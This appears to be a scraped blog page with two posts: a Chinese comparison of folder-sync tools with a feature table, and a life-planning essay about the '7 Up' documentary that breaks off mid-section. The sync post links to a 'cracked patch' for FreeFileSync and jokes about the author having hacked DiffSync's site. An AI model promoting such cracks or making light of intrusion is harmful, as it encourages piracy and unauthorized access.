p　　相信很多人碰到过这样的场景：/p p　　某苦逼程序猿白天在公司努力干活，下班还需要把公司的文件资料带回家继续加班工作，第二天早上上班再拿来更新到公司电脑上。/p p　　如果工作文件很多，而且每次修改的文件较多的话，人工对比是一件很操蛋的事情，这时候就需要一些strong文件同步工具/strong了，尤其是strong双向/strong的文件同步工具。/p p　　像**a href="https://lcx.cc/"核总/a**a href="https://lcx.cc/"(https:/lcx.cc/)/a就是这样一个经常拿着U盘在各个电脑来来回回、跑来跑去的人，非常需要这种工具，这些年用过的**文件对比同步工具**也很多。/p p　　例如最早国产的strongDiffSync(文件夹同步专家)/strong，当时用了好几年，后来作者出了 v1.008 终结版后就不再更新了，官网也关闭了，并且功能不完善、不支持某些特殊需求，又转到了其他工具，陆陆续续也用了很多种，这里把几款用过的工具做个简单的对比。/p p　　备注：由于软件名长度太长，表格会撑变形，这里使用strong首字母缩写/strong代替。/p table thead tr th软件/th thFC/th thFFS/th thGS/th thAS/th thDS/th thPS/th /tr /thead tbody tr td文件权限(ACL)/td td√/td td√/td td√/td td×/td td×/td td×/td /tr tr td文件属性(DACL)/td td√/td td√/td td√/td td√/td td√/td td×/td /tr tr td目录权限(ACL)/td td√/td td√/td td√/td td×/td td×/td td×/td /tr tr td目录属性(DACL)/td td√/td td√/td td√/td td?/td td×/td td×/td /tr tr td文件创建日期/td td√/td td√/td td√/td td√/td td√/td td×/td /tr tr td文件修改日期/td td√/td td√/td td√/td td√/td td√/td td√/td /tr tr td文件访问日期/td td√/td td×/td td×/td td√/td td√/td td×/td /tr tr td目录创建时间/td td√/td td√/td td√/td td√/td td×/td td×/td /tr tr td目录修改时间/td td√/td td√/td td√/td td×/td td×/td td×/td /tr tr td目录访问时间/td td√/td td×/td td×/td td×/td td×/td td×/td /tr tr tdHash校验对比/td td√/td td√/td td√/td td×/td td×/td td×/td /tr tr td支持双向同步/td td!/td td√/td td√/td td√/td td×/td td√/td /tr /tbody /table h3 id="fastcopy-fc"FastCopy (FC)/h3 p　　官网：https://fastcopy.jp//p p　　FastCopy 是一款 Windows 平台上最快的文件复制、删除软件，它支持 UNICODE 和超过 MAX_PATH （260 个字符）的文件路径名，由一家日本公司开发，同时支持简单的文件同步功能。/p h3 id="freefilesync-ffs"FreeFileSync (FFS)/h3 p　　官网：https://freefilesync.org//p p　　FreeFileSync 是一个免费的、开源的文件夹比较和同步软件。支持Windows、Linux、Mac OS X，它也适用于64位操作系统。/p p　　程序安装默认可选择一个标准的安装程序或作为一个便携式应用程序。采用一个干净、简单、直观的界面，以同步为目标，提供了多种功能。/p p　　strong我个人感觉比较好用的一款~/strong/p p　　如何免费实现官方的strong绿色便携版/strong功能及strong屏蔽自动更新/strong：/p p　　a href="https://lcx.cc/post/4591/"FreeFileSync 全版本破解补丁、绿色便携版/a/p h3 id="goodsync-gs"GoodSync (GS)/h3 p　　官网：https://www.goodsync.com//p p　　使用 GoodSync 轻松备份和同步文件。我们简单安全的文件备份和同步软件将确保您的文件永不丢失。/p p　　Windows 和 Linux 服务器的数据备份和同步。易于使用的自动化和无人值守服务，具有多个目标选项。/p p　　文件同步工具 GoodSync 可以实现两台电脑或者电脑与U盘之间的数据和文件的同步转换。通过此工具，可以备份U盘中Pass2Go 中的数据或者其他文件到个人电脑的硬盘上。/p p　　GoodSync 是一种简单和可靠的文件备份和文件同步软件。它会自动分析、同步，并备份您的电子邮件、珍贵的家庭照片、联系人、MP3歌曲，财务文件和其他重要文件本地-之间的台式机，笔记本电脑，服务器，外部驱动器，以及Windows Mobile设备，以及通过FTP远程，网友的WebDAV等等。/p p　　strong跨平台并且支持多协议文件同步，功能很强大！/strong/p h3 id="allway-sync-as"Allway Sync (AS)/h3 p　　官网：https://allwaysync.com//p p　　Allway Sync是一款Windows 文件同步软件。/p p　　它可以在几个文件夹之间进行文件同步，自动将更新的文件覆盖几个同步文件夹中的旧文件。/p p　　软件带有一个小型数据库，监视每次更新后的文件状态。如果一次同步之后，你删除了同步文件夹中某些文件，它在同步的时候将其它的几个文件夹的副本也删除，而不会将未删除的旧文件重复拷贝到更新的文件夹。/p h3 id="pathsync-ps"PathSync (PS)/h3 p　　官网：https://www.cockos.com/pathsync//p p　　PathSync 是一款目录文件同步工具。/p p　　PathSync 是 Cockos 出品，Cockos 是 Justin Frankel (开发 Winamp 的那个家伙) 成立的公司，开发的产品也是和音频有关的。这个小工具估计是他们搂柴火打兔子随便搞出来的，但真是很好用。免费。/p p　　PathSync 是由Cockos的一个伟大的员工在04年开发的，本来是随便玩玩的，结果是无心插柳柳成荫，反而将Pathsync做成了一个体积小巧，功能强大的同步工具。从04年到现在，已经陆续推出了数个版本，最后一次更新是在2015/12/28。目前的功能已经趋于完美，所以很久没有新动向了，如果大家有什么特殊想法，请遵循GPL协议，自己修改源代码增加修改功能。/p h3 id="diffsync-ds"DiffSync (DS)/h3 p　　官网：dela href="http://www.diffsync.com"www.diffsync.com/a/del（域名于2010年6月14日到期，现已变成垃圾广告网站）/p p　　DiffSync(文件夹同步专家)，简称DiffSync。DiffSync是一个文件差异同步专家，他功能强大，可以根据文件的大小，创建时间，修改时间，访问时间，文件属性等，进行对比，根据对比结果，进行差异同步。特有的高性能算法，让文件对比，变得如此快速。超快的文件复制功能，让大量文件同步，变的如此轻松。/p p　　作者放出“DiffSync v1.008 终结版”后就不再更新了，官网也随之关闭了，以下为最后版本的信息：/p blockquote p名称：DiffSync(文件夹同步专家)/p p版本：1.008/p p日期：2010-4-25/p p作者：徐怀移/p p邮箱：xudea@126.com/p pQQ：185452635/p p官网：dela href="http://www.diffsync.com"www.diffsync.com/a/del/p p说明：diffsync.com 域名于2010年6月14日到期，为了广大用户的安全，请升级到本版本，本版本，移除检查更新，移除广告，移除和 diffsync.com 的所有连接，本版本将会是 diffsync 的最后一个版本。/p /blockquote p　　strong哈哈！官网很久以前被a href="https://lcx.cc/"核总/a黑过……/strong/p

《人生七年》，是什么在决定命运？

Nuclear'Atk（核攻击）网络安全实验室

2018年9月14日 23:09

pimg src="https://lcx.cc/file/4588/1.jpg" alt="人生命运规划"/p !-- https://static.wixstatic.com/media/b2dfdd826840478bb97492cb871e8c27.jpg -- h2 id="前言"前言/h2 p　　多年前，曾看过此篇文章（内容雷同），以及 BBC 每隔七年跟拍穷人与富人长达 49 年的纪录片：a href="https://baike.baidu.com/item/%E4%BA%BA%E7%94%9F%E4%B8%83%E5%B9%B4/14814750"《人生七年》/a/p p　　多年后，再次看到此文，随着人生的成长、学识的增加、阅历的丰富，人生的见解也产生了一些变化，觉得有必要在这里记录下。/p hr h2 id="原文"原文/h2 p　　以下为转载的原文：a href="https://zhuanlan.zhihu.com/p/39949648"25岁前，一定要完成哪些人生规划？/a/p h3 id="序言"序言/h3 p　　最近在朋友的安利下看了 BBC 一部非常优秀的纪录片a href="https://zhuanlan.zhihu.com/p/39949648"《BBC 跟拍 49 年：穷人与富人的人生七年》/a，完全被震撼到了。/p p　　导演似乎想要证明：strong富人的孩子还将会是富人，穷人的孩子多半还将会是穷人/strong。导演选择了 14 个不同阶层的孩子进行跟拍，每七年记录一次他们的生活，分别是他们 7 岁，14 岁，21 岁，28 岁，35 岁，42 岁，49 岁，一直到 2012 年他们 56 岁的生活。/p p　　这部 150 分钟的片子基本上证明了导演的初衷：strong社会阶层的鸿沟是很难逾越。/strong/p p　　是这些穷人不努力么？是他们没有机会么？是他们基因不好么？/p p　　这些并不是根本原因。这些穷人孩子里不乏天赋绝佳、工作拼命、机会多多的人，但他们依然过得很不如意。strong归根结底是他们没有人帮他们正确的规划人生，在人生的分叉口上没有做出正确选择。/strong/p p　　那么哪些规划是越早做就越好的呢？/p h3 id="1人生路径规划"1、人生路径规划/h3 p　　这是非常让人难过却又很现实的问题：这些孩子 7 岁时，富人家长已经告诉孩子 Andrew 和 John 要常看《金融报》和《观察家》了，让他们开始对社会和财富运行规律有所了解，他们也会告诉孩子未来他们会上私立中学，考上牛津剑桥，走入社会上层。一切都被预定好了。/p p　　贫民窟的孩子则基本都在为温饱、家庭暴力、校园暴力所困扰，这时候的strong他们和家长都完全没有规划人生的意识。/strong/p p　　在这些孩子 5、6 岁的时候，strong富人家的 7 个孩子基本都上私立学校——读牛津、剑桥——成为律师、教授走入社会上层；底层社会的孩子后来大多做着普通的服务性工作——修理工、保安之类/strong。而他们也常与失业、贫穷、酒精、毒品、肥胖相伴。如果没有社会福利，他们生存处境堪忧。/p p　　其实现实生活里也不乏寒门出贵子的故事，这些寒门子弟成为贵子的根本原因是strong他们选择成为成功的人。他们愿意规划人生，尽力跳出原来的圈子去同那些更加优秀的人交流、学习。/strong/p p　　**人和人之间最本质的差别不是技能，而是认知。**这些成为贵子的寒门子弟首先都要对成功有所渴望，strong在树立目标的前提下制定自己的人生规划，他们对财富积累、被动收入、自我管理都有了一定的认识/strong。当机会来的时候，他们就能一下抓住，即使抓不住，他们也会积极的创造、等待机会。/p p　　能够规划自己人生的穷人，只是现在没钱，但不代表将来也没钱。可是缺乏规划、目标意识的穷人。strong即便是给他一个机会，他也不会意识到这是个机会。/strong/p p　　建议：/p p　　（1）青天不算高，人心第一高。strong青年人一定要对未来和自己有信心，这是基础/strong。同时也要认识到，如果想要打破社会阶层壁垒，仅靠你一代人未必能够实现，要有足够耐心。/p p　　（2）胡适告诫儿子：做人要做第一等人。strong凡事要做到最好，读书要尽可能去最好的学校，工作要尽可能去好的平台/strong。这不是贪求虚名，好的平台给你的眼界和资源、机会是完全不一样的。/p p　　（3）strong选择行业、职业，第一看这个职业是不是社会长期刚需/strong，例如医生、飞行员，受外在因素影响较小且收入相对较高；第二看这个行业是否在快速发展，如果这个行业已经陷入迟滞，远离之。/p p　　（4）strong给自己设立一个比自己现在的能力高的多的目标/strong，然后把这个目标分解，再去研究如何达到这个目标，去学习，去实践，拼尽一切努力实现之。/p h3 id="2身体和欲望规划"2、身体和欲望规划/h3 p　　一个人成功与否，strong知道该做什么还在其次，知道不该做什么更加重要/strong。知乎上就有一个关注量超过十万的热门问题：a href="https://www.zhihu.com/question/39004511"年轻人千万别碰哪些东西？/a/p p　　这些答案看下来让人触目惊心，黄、赌、毒、邪教、传销……好多你以为只会出现在电视上的事情都很真实地发生在这个社会上。/p p　　归根结底，那些答案里讲的年轻人都是扛不住欲望的诱惑，对自己的身体又看得轻贱，最终染上了艾滋、毒瘾、赌瘾，或者陷入了对快钱的渴望，走上了不归之路。/p p　　另一件一定要做的事就是对身体、健康的管理，说白了就是运动strong控制体形、控制饮食/strong。因为不运动的胖人跟常运动的瘦人的工作、生活状态真心不一样。/p p　　你连自己的体重都控制不了，谈何控制人生？这样说不是没有道理，《穷人与富人的人生七年》里的精英阶层 Andrew 和 Jone 在 56 岁时还保持着较好的体型；属于中产阶级的公务员 Peter 夫妇身材也较好；但是底层阶级的男主们和他们的妻子就基本都肥胖臃肿、秃顶严重，他们有好几个在年轻时都是非常帅气英俊的。/p p　　strong优秀的家庭背景不仅仅代表着更丰富的资源，重要的是会传递给孩子优良的生活和自我管理习惯/strong。这些孩子在自我管理、抵抗诱惑的时候会更加有毅力，会更加自律自强。/p p　　年轻人一定要好好规划自己的健身和欲望管理计划，strong前者是为了让你更好的工作和享受生活/strong，让你有更强的毅力和活力，strong后者是为了让你不至于因为一时的欲望，毁掉要用一辈子的身体。/strong/p p　　建议：/p p　　（1）性、快钱、美食，谁都想要，可是strong你一定要想清楚自己是要一时的快感还是长期的成长/strong。这样的纠结可能会伴随人一辈子，但是只要选错一次就是深渊。/p p　　（2）strong千万不要接近毒品、赌博、嫖娼的人/strong，这些人在长期跟自己思想斗争的过程中坚定地认为自己是对的，如果你接近他们，就会有机会被拖下水。知乎上讲了一个女孩子为了挽救吸毒的男友，被拉下水吸毒，让人不胜唏嘘。/p p　　（3）strong放弃那些吃了会让你难受的食物/strong，尽可能远离高油、高糖、刺激的食物。/p p　　（4）strong制定长期的健身计划/strong，尽可能的花钱请私教，特别是如果你坚持不下来，就让私教督促你。胖子和瘦子，特别是身材好的人的人生体验真心不一样。/p h3 id="3刻意学习与练习的规划"3、刻意学习与练习的规划/h3 p　　大家都知道学习和练习的重要性。但是绝大多数人都是strong非常泛泛且缺乏体系、没有重点的学习/strong。这种学习好像在浇田时用大水漫灌，事倍功半。/p p　　很多人就是推崇这种空有“努力”的学习源于美国作家格莱德威尔曾经提出的一个非常知名的 1 万小时定律：想要从一个普通人成长为该领域的专家，至少需要 1 万小时的练习（按每天工作 8 小时，一周五天，大约要五年）。/p p　　strong可从业超过五年甚至十年的程序员多了去了，有几个成了比尔·盖茨、扎克伯格？/strong/p p　　strong大水漫灌式的学习、练习，远远不如喷灌、滴灌式的刻意练习、学习来的高效。/strong/p p　　这种刻意学习需要strong你在对自身问题有深刻了解的情况下，通过实践不断地加深对自己和所处领域的认知/strong，同时不断的接收来自别人的反馈（可以主动询问比你优秀、厉害的大牛），规划自己的学习计划。/p p　　我们这里可以引入“改善率”的概念，即strong重要的不是你学习了多少新东西，而是你改正了多少错误，弥补了多少短板，根据你的需要学习了多少新东西。/strong/p p　　亿万富翁马克·安德森曾在谈到扎克伯格时说：如果你有机会同扎克伯格这样伟大的 CEO 待在一起，你就会发现，其实strong他们每个人都是百科全书式的专家，他们对本行业或者对其他领域都有很深的了解，这些都是通过刻意学习、训练得来的。/strong/p p　　要取得成功，重要的是“改善率”，有针对性的解决自己的问题，有重点地了解相应的知识，而非宽泛的学习。/p p　　建议：/p p　　（1）strong尽可能多的阅读行业报告、公司财报/strong，对相关领域有通盘了解，知道自己需要了解但不了解什么，有针对性的学习、练习。/p p　　（2）strong每周定期自我总结/strong，不管是工作上的还是生活上的，要敢于发现自己的问题，然后想尽一切办法改正。/p p　　（3）strong找一个段位比自己高且愿意帮助自己的人做自己的导师/strong，并建立相应的反馈机制，多多听取对方的意见。有句话很好：迷茫时不要求助于最亲近的人，找身边最有智慧的人。/p h3 id="4对家庭的规划"4、对家庭的规划/h3 p　　除了我们自己的身体之外，能够陪伴我们最久，给予我们最大支持的就是我们的家庭了。就像豆瓣网友“菜”说的：strong一生中跟我们有密切联系的人应该不会超过 100 个人，甚至 30 - 60 人这个数量级别都是正常的，亲人就是其中最密切的人之一。/strong/p p　　有很多人可能根本没有意识到家庭对人的影响有多大：电影里一个叫 Sue 的女孩，离婚后自己带着孩子生活，经历了一段人生低谷，后来再婚后夫妻生活很和谐，事业和生活也渐渐有了起色。/p p　　另一个女孩则嫁了两次离了两次，生下的几个孩子也都因为种种原因没有上大学，自己身体不好还遭遇了一系列的情感打击，一直只能靠救济金过活。/p p　　其实不仅仅女人是这样，男人找到一个好的妻子对人生的改变也是及其显著的。女人找老公是托付终生，男人找老婆又何尝不是呢？/p p　　美国作家约翰·威廉斯的小说《斯通纳》中的主人公威廉斯·斯通纳就是一个很鲜明的例子。作为大学老师，本来还算是年轻有为的他，因为跟妻子之间贯穿始终的冷漠，在妻子压力下跟他疏离的女儿，活力全无的家庭耗尽了他对生活的最后一丝激情，最终只好孤独的面对死亡。/p p　　strong一段糟糕的婚姻牵扯甚广，能够影响你的心情、事业、父母、生活/strong，而且即便是你遇到了下一份感情，你也要费心费力的处理上一段的遗留问题，而且如果已经有了孩子，还要应付你失败的婚姻给孩子带来的伤害。/p p　　所以，strong在选择另一半成就你的家庭时一定要慎之又慎，要仔细地考虑什么对你是最好的，什么是对你的另一半最好的/strong。在处理感情问题时，也可以strong适当的学一些技巧，避免因为自己没有处理矛盾的经验伤害了自己珍惜的感情。/strong/p p　　建议：/p p　　（1）strong找一个能聊的来、有共同志向，能够互相包容的另一半/strong，在一起的时候相互珍惜，别“作”。/p p　　（2）strong要尊重（自尊和尊重别人）/strong，要理解，要平等，需要跪舔的不是爱情，更不会长久。/p p　　（3）strong最多生两个孩子/strong，要知道你的人生也属于你自己，不要把一辈子都放在孩子身上。/p p　　（4）strong尽可能多挣钱提高生活水平/strong，比如做斜杠青年，如果不行，量入为出。/p p　　（5）strong学会攒钱、理财、买保险。/strong/p p　　总之，有些人生规划还是越早做越好，很多时候当你醒悟过来，到底是什么把你和别人区分开来的时候，你往往已经没有追赶的余地了。/p hr h2 id="关于人生七年"关于《人生七年》/h2 p　　《人生七年》（英文原名《7 up》）由迈克尔·艾普特执导，Bruce Balden、Jacqueline Bassett、Symon Basterfield 等出演的一部由 ITV 出品的纪录片。/p p　　迈克尔·艾普特从 1964 年开始拍摄的纪录片系列的第一部。/p p　　迈克尔·艾普特在 1964 年为英国 BBC 电视台拍摄了记录片《7 Up》，采访来自英国不同阶层的十四个七岁的小孩子，他们有的来自孤儿院，有的是上层社会的小孩。/p p　　此后每隔七年，艾普特都会重新采访当年的这些孩子，倾听他们的梦想，畅谈他们的生活。四十九岁知天命，看尽岁月流逝，看穿沧海桑田。/p p　　本片综合了被访者七岁、十四岁、二十一岁、二十八岁、三十五岁、四十二岁、四十九岁及五十六岁多年的访问精华。/p p　　《人生七年》荣获2006年英国电影学院奖和金卫星奖提名。/p h2 id="剧情简介"剧情简介/h2 p　　人生七年，又称 7 up ，是一部由 ITV 出品的纪录片，于 1964 年开始记录 14 位英国的七岁儿童的生活，到目前为止，该纪录片已经跨越 49 年（每 7 年一集）并在 ITV 和 BBC 播出。/p p　　2005 年英国第四台将该系列纳入最伟大的 50 部纪录片名单中。/p p　　被选中的孩子们代表了当时英国不同社会经济背景的阶层，并做出了明确的假设，即每个孩子的社会阶级预先决定了他们的未来。/p p　　每隔 7 年导演迈克尔·艾普特从 14 位参与拍摄的参与者生活中取材。/p p　　该系列的目的是按当初 7 Up 中的“我们把这些孩子们聚到一起，因为我们想在 2000 年时看看英格兰的一个缩影，2000 年时的工人和主管，现在都只有七岁。”/p h2 id="精华影评"精华影评/h2 p　　以下内容摘录自：a href="https://baijiahao.baidu.com/s?id=1568670268592846"我是如何看完纪录片《人生7年》的？（附精华总结）/a/p hr h3 id="前言-1"前言/h3 p　　兄弟偶然的介绍，然后这两天我一口气看完这部纪录片，接着立刻搜刮了豆瓣和知乎上所有精华的影评及文章，总计17个文档，来自数十个影评和知乎分享作者，总计155216字，然后分21个层面浓缩成最后这篇5849字的文章。/p p　　关于人生我们总是有那么多困惑、迷茫，尤其是做选择的时候，这也是为什么我花那么多时间来整理的原因；/p p　　不管你现在处于什么年龄段，我希望以后少点烦恼，面对机会，多一点选择的空间，这就是我想要的；/p p　　每一条放在某一个人身上都是血淋淋的教训，也是数十位作者的荟萃，所以如果有心请先看完纪录片再回来看，那时候你感受到的就不会是鸡汤，而是具体的行动指南和指引；/p p　　strong整个纪录片像是一面大海，看起来很平淡，里面却是暗潮涌动。/strong/p h3 id="一关于人物"一、关于人物/h3 h4 id="1john"1.John/h4 p　　21岁时的观点：人们总以为他们这个阶层的人生就是顺风顺水，想去哪所学校读书就去哪所学校，一看起来都是那么的顺理成章。/p p　　但是人们并没有看到那些挑灯夜战的日子，那些刻苦努力的日子。/p p　　这是社会对他们的误解。/p p　　strong真的唯有努力，才能让这一切看起来毫不费力。/strong/p h4 id="2tony"2.Tony/h4 p　　尽管出身贫苦，但他永远乐观坚强，永远对生活有激情。/p p　　有敢想敢做的性格（导演问，但是你没有成功呀，他说至少我都试过了。），没有眼高手低，去幻想那些自己遥不可及的高度，一切的“我想”都是在合理的范围内。/p p　　21岁意识到自己不适合骑师，放弃了，去学出租车，后来如愿成为出租车司机。/p p　　但问到他人生最开心的时刻，还是当骑师的时候和自己的偶像同场竞技，那种骄傲，那种满足，尽管没能做出成就，但是strong感激曾经拥有。/strong/p p　　strong一个人对于自己生活有一个美好愿景是多么重要的一件事。/strong/p p　　这个参数直接决定了人生轨迹，它甚至不和其他参数相关，它单纯地决定了他们的人生之路。/p h4 id="3bruce"3.Bruce/h4 p　　小天使，虔诚的基督徒，家境很好。/p p　　很单纯，没有偏见，乐于付出，生活简单幸福。/p h4 id="4john"4.John/h4 p　　典型精英阶层子弟，一路私立学校，牛津读的法律，后来去了法庭，娶的是前保加利亚大使的女儿，他自己的曾祖父就曾是保加利亚首相，可见背景之雄厚。/p p　　他一直拥有的是一种经典而高贵的贵族思维，就是strong自己确实比别人拥有更多，但就是要承担更多责任，就是要凭着自己的背景和能力对社会做更多的贡献。/strong/p h4 id="5andrew"5.Andrew/h4 p　　与John类似，精英阶层子弟的道路看起来确实一帆风顺，他也对阶级没有太多看法，只是觉得，strong家里能给孩子的，最重要的还是好的教育，好的教育没人能夺走。/strong/p h4 id="6neil"6.Neil/h4 p　　正是因为在年轻时候就自缚双手，Neil才失去了和他人、这个社会、这个世界的联系，一生在物质上、精神上、感情上都陷入了孤立无援的状态。/p p　　在21岁的时候他说自己的人生太缺少障碍，我理解他也希望自己能坚强地忠于自己的愿景，但他没有做到。/p p　　strong他本有很多机会，但他太轻易就放弃了。/strong/p h3 id="二关于阶级"二、关于阶级/h3 p　　1.想要改变自己的阶级，从影片中展现出来的似乎只有从好好读书来实现了（现在中国的真实写照）。/p p　　幸运的是在我们国家，现在这个时代，strong中下阶级正面临着频繁快速的洗牌/strong，如果勤快一点，机灵一点，我们这一代跨越阶级是可以实现的，尤其是从一无所有到略有田产，再下一代，就需要我们这代来引导教育和看他们自己的命运了。/p p　　普通阶层的孩子大多没有上大学，工薪阶层，结婚很早，人生很早就固定在了普通阶层中，甚至他们的孩子也很少有上大学的，人生轨迹与他们并没有太大不同；/p p　　而精英阶层，从小的道路非常清晰，一步一步，名校毕业，踏入律师之类的职业，孩子也是名校，就算年轻的时候彷徨过，优越的背景也使他们彷徨之后依然有机会重新回归富裕的生活。/p p　　2.人生要过得怎么样，strong出身决定了起点，但绝不决定你的终点，过程看个人/strong，抛开家庭背景、父母这些先天、个人无法改变的因素，strong你尽自己个人的力量走了多远，超越了你原有的阶层多远。/strong/p p　　3.strong如何做好现在的自己才是我们应该考虑的事情/strong，毕竟出身不可选择。/p p　　4.strong身处什么样的阶层就选择什么样的生活，可以努力，但不要强求/strong。只追求属于你自己的生活。/p p　　5.strong精英阶层固然生活更舒适，但是社会对他们的期望值也更高，所以他们和梦想的相对距离，和底层与梦想的相对距离其实是一样的。/strong/p h3 id="三关于亲情"三、关于亲情/h3 p　　28－35岁之间，好几位都承受了父亲或母亲去世的痛苦。strong为了不在未来后悔，还是请抽时间多和父母说说话，多陪伴他们。/strong/p h3 id="四关于观念"四、关于观念/h3 p　　1.没有任何一个人能完全站在他人的角度体会别人的人生。所以，strong请不要轻易对别人的人生下定义下结论。/strong/p p　　2.不要妄想冻结时间。没有人能抵抗时间的流逝。/p p　　3.我最大的错误在于strong忽视了现实的复杂性，肤浅的认知和自不量力地扮演“上帝”的角色，对他人的生活做出评判/strong。我相信这也是很多人犯的错误，我们不能仅仅就凭一些片段就武断地做出评价、给别人的人生下了定义，这是对他人人生的一种不尊敬，反过来会换来别人对自己人生的不尊重。看完影片后，脑中闪出这么一句话：strong最终能对你的人生做出总评的人还是你自己。/strong/p p　　4.可是就中国而言，对大学教育真的很失望，抛开教育，可能更多的还是strong需要个人努力，永远不要停止学习，永远不要抛弃对世界的好奇心。/strong/p h3 id="五关于教育"五、关于教育/h3 p　　1.如果没有机会接受高大上的学校教育，那么进入社会以后，就积极接受社会所带来的教育，保持上进学习的态度，乐于实践，为自己想要的生活而努力。/p p　　2.Andrew的那句“strong人无法确定能留给下一代什么财物，但至少可以确定，一旦给了他们好的教育，他们终生都可以受用/strong”/p p　　3.不同人之间的差异又在很大程度上由教育程度和教育经历的不同塑造。因此如果非要说有什么促进社会公平的良药，那么教育定当是第一位。/p h3 id="六关于健康"六、关于健康/h3 p　　1.strong身体是最大的本钱/strong，积极的运动，锻炼身体，合理饮食，保持健康的体魄。/p p　　2.光生活在有钱人的家里，其实还是不够的，还要有足够的教育水平，这样的家庭教育出来的孩子才是真的有教养，有眼光，并且谦虚低调。/p p　　3.一个乐观、向上的精神离不开优渥的物质生活基础，同样，优渥的物质生活，需要的是一个健康的体魄。/p h3 id="七关于家庭"七、关于家庭/h3 p　　1.一个strong稳定的家庭环境/strong，不管是小时候与父母组成的家庭，还是长大后自己通过婚姻组成的家庭，真的都strong太重要/strong了。/p p　　2.家族能带给你不一样的背景，不一样的野心和信念，不一样的未来机遇。/p p　　3.珍惜身边的人，孝顺父母，包容自己的伴侣，与孩子保持亲密的关系，营造快乐向上的家庭氛围。树欲静而风不止，子欲养而亲不待。/p p　　4.孩子的成长不是学校的事，不是孩子一个人的事，而是一个家庭的事，良好的生活习惯，做人道理，坚强的意志，这些都是要靠父母去培养的。/p p　　5.strong父母能给子女最好的成长礼物是陪伴。/strong/p h3 id="八关于幸福"八、关于幸福/h3 p　　1.大家幸福的来源很大部分源于家庭，源于承担责任。而更多人的更大满足感，源于付出，源于奉献。/p p　　2.对一个人来说，最大的幸福就是自己和家人健康，婚姻幸福，儿孙满堂。在这个基本幸福之外，有野心的人期待着实现更大的自我价值，惠及他人。幸福的生活都相似，不幸的生活，各有各的不幸。/p p　　3.一个人幸福不幸福，不仅仅在于事业上是否取得了成功，而在于是否有陪伴自己的家人。/p p　　4.生活就像一盒巧克力，你永远不知道下一颗是什么，但是千万别失望，最好的总会到来。以及所谓的成功幸福根本没有量化的标准。/p p　　5.人们总是倾向于追求“别处的风景”，却常常在失去了熟悉事物的时候才追溯它的美好。/p p　　6.幸福也许只是一种态度。/p p　　7.strong幸福就是你的能力大于你的欲望/strong。就是如果你能让自己过上比你预期好的生活，你就会幸福。比如你一个月能挣10000，但是你对生活的预期就是1000的预期，那你就幸福。如果你一个月挣1000，但是你对生活的预期只有10，那你也幸福。如果你能挣10000，但是你的预期是100000，那你就不幸福了。/p p　　8.至于金钱是否能让人生活的幸福一事，我是这么认为的：并不是钱越多就一定越幸福，但是钱少大多数不幸福。在一定的范围之内，钱越多越幸福。超过一定数值，幸福和钱多少关系不太大，/p h3 id="九关于资源"九、关于资源/h3 p　　1.80%的富人阶级的孩子能够打好手上的一副好牌，懂得把握自己拥有的机会，相对轻松地实现自己的梦想，其余20%却浑浑噩噩，浪费一手好牌，沦为浪荡的败家子；20%的穷人阶级的孩子意识到上进的重要性，刻苦努力希望打破阶级壁垒，其余80%却只能平平淡淡的讨生活，活在自己的小格局里。/p p　　2.strong世界上真正的赢家往往是那些拥有更多资源的人/strong。这是一条残酷的法则。但不得不承认，这就是现实。/p p　　3.家庭出身好的人，他们往往很早就领悟到自己人生的使命。/p p　　4.恰如“马太效应”，strong强者会拥有更多的资源，则愈加强大；而弱者却面临资源的稀缺，则愈加弱小/strong。这些资源中尤为明显的是“教育资源”，同样7岁的孩子，有孩子在读金融时报，有孩子却只求在福利院中不再挨打；/p p　　em案例：聊到关于高考的话题，我说：“怪不得你高中压力那么大，毕竟从小到大，你的家庭给你提供了最优秀的社会资源，你没有理由考的差。”在同一个尺杆下，我们都有跳过1米5的能力，但是种种原因，你比我的起点高了30公分，你的梦想可以是跳过1米8，我的梦想只能是跳过1米5。如果我和你付出同样的汗水，我永远无法超越你。如果你和我付出同样的汗水，你取得的成绩也不配嘲笑我，当你在嘲笑别人的时候，你也会惊愕，原来有的人起点就是1米8。/em/p h3 id="十关于爱情"十、关于爱情/h3 p　　1.永远对爱情抱有希望，永远不要觉得自己等不来一个对的人。/p p　　2.我想到了最浪漫的事就是和你一起慢慢变老；/p p　　3.任何一段long relationship，势必都需要足够多的tolerance和inclusiveness，让彼此成为最适合的那个人吧，任何一方放弃努力，那么就没有办法work out。而像经历了37年婚姻的Lynn说的那样，好的关系是“两个人一起成长”。/p h3 id="十一关于选择"十一、关于选择/h3 p　　1.人生真的有很多可能性，各不相同，就像一首诗里提到的丛林里的两条路。人生对于很多人来说，就是很多条路，但又似乎有注定的轨迹。这一切在于你的选择，残酷的地方在于，你只能选择其中的一种。所以该好好问问自己，什么是自己真正想要的。/p p　　2.就算每个人的背景、环境、性格千差万别，生活其实永远有无限种展开的方式，并且很大一部分取决于自己的选择。你想要成为一个什么样的人。你想要过一个什么样的生活。我们现在走的每一步，正是过去无数步累积而成的结果。不能回头，所以strong请对自己的选择负责。/strong/p p　　3.选择权永远在于你自己，无论是情绪，还是困惑，无论是困难还是，工作还是未来，你永远有更好选择，懒，本身也是你，另外一个选择罢了，既然选择了，就要承受责任，选择以后带来的后果。/p p　　4.不论什么时候，你感觉迷茫，不知道该怎么办，该做什么时候，就坐下来和自己内心谈谈，问问内心那个自己到底要去做什么，然后去做！/p p　　5.当你有了钱，你就有更多的机会去接触更多的可能性，然后选择你最喜欢的一种方式，沙滩晒太阳只是其中的一种而已。strong如果你没有见过世面，那在你的世界里，就只有晒太阳。/strong/p h3 id="十二关于成长"十二、关于成长/h3 p　　1.年轻时，当生活中有变故时，当遭受巨大打击时，一定要顶住，否则一辈子的命运可能就会急转直下。Neil就是例子。/p p　　2.还是要靠自己的信念，想通了也就那么回事。/p p　　3.生活是自己过的，真当生活过不下去的时候自然会改变；路是自己走的，真当走不下去的时候自然会拐弯，何必总是听外人指手划脚。生活面前，谁都不会是备胎。/p p　　4.现在有人说，你连自己的体重都控制不了，你连冬天早晨起床都起不了，你如何能有毅力去控制人生呢？/p p　　5.其实人没有自己想象的那么强也没有自己想象的那么弱。最终大家都会适应环境。“原来河水既不像老牛说的那么浅，也不像小松鼠说的那么深。”/p p　　6.我们一直活得很忙碌，忙到从来没有仔细的审视他人和自己的一生，但凡听过的以一生为周期的故事，要么是名人列传，要么是传说故事，却从没一个属于我们身边这样的一些平凡人的。突然的改变，不多。不过循序渐进的变化，是有可能的。想要得到更好的生活，需要努力，需要辛苦付出。/p p　　7.strong成长，就是承担责任的过程。/strong/p p　　8.尽可能每一天都活得像一张白纸。/p h3 id="十三关于婚姻"十三、关于婚姻/h3 p　　1.不要生太多孩子，结婚前要看对人，不要眼高手低，不要肥胖。/p p　　